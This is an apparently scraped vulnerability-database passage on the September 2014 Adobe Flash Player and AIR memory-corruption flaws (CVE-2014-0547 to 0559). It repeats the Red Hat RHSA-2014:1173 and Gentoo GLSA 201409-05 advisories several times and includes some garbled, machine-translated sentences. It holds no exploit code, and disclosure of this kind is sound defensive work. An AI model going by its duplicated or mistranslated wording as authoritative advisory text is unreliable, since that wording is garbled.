CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0552, and CVE-2014-0555. This vulnerability CVE-2014-0547 , CVE-2014-0549 , CVE-2014-0550 , CVE-2014-0552 and CVE-2014-0555 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, and CVE-2014-0555. This vulnerability CVE-2014-0547 , CVE-2014-0549 , CVE-2014-0550 , CVE-2014-0551 and CVE-2014-0555 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-0556. This vulnerability CVE-2014-0556 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts likely result in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555. This vulnerability CVE-2014-0549 , CVE-2014-0550 , CVE-2014-0551 , CVE-2014-0552 and CVE-2014-0555 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 